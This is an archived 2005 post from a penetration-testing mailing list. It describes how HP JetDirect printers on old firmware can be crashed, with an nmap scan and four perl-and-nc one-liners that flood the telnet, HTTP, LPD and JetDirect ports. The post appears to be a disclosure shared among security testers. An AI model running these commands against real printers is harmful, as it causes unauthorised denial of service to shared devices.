Penetration Testing mailing list archives
Re: Experiences with company nCircle and their IP360 product
From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Fri, 2 Dec 2005 19:50:41 +0100 (CET)
One other thing I've seen with nCircle (& a few other scanners), if you run internally & have any legacy HP jetdirect printers located on your network, you may want to check with nCircle to see if their scans still lock up those printers.
Actually, it's usually fairly easy to DoS printers, specially if they are using an old firmware release. Here are a few ways to reproduce some HP JetDirect vulnerabilities (tested on J3111A, firmware version G.05.35 -- it's quite old, i didn't bother to test newer releases):
root@charon:~# nmap -A x.x.x.x Interesting ports on printer.mediaservice.pri (x.x.x.x): (The 1655 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 23/tcp open telnet HP JetDirect printer telnetd 80/tcp open http? 515/tcp open printer? 9100/tcp open jetdirect? Device type: printer|print server Running: HP embedded OS details: HP printer w/JetDirect card 1) TELNET. Crash all network services: root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23 2) HTTP. Crash all network services with funny stack dump on paper: root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80 3) PRINTER. The printer switches indefinitely between data recv and ready: root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515 4) JETDIRECT. Prints ABCD... and leaves the printer in "unstable" status: root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100Pretty lame, isn't it? In case someone's interested i've scanned the funny stack dump printed on paper and put it on-line here:
http://www.0xdeadbeef.info/stuff/hp-crash.jpg Sincerely, -- Marco Ivaldi Antifork Research, Inc. http://0xdeadbeef.info/ 3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707 ------------------------------------------------------------------------------Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at:
http://www.securityfocus.com/sponsor/pen-test_050831 -------------------------------------------------------------------------------
Current thread:
- Re: Experiences with company nCircle and their IP360 product Marco Ivaldi (Dec 03)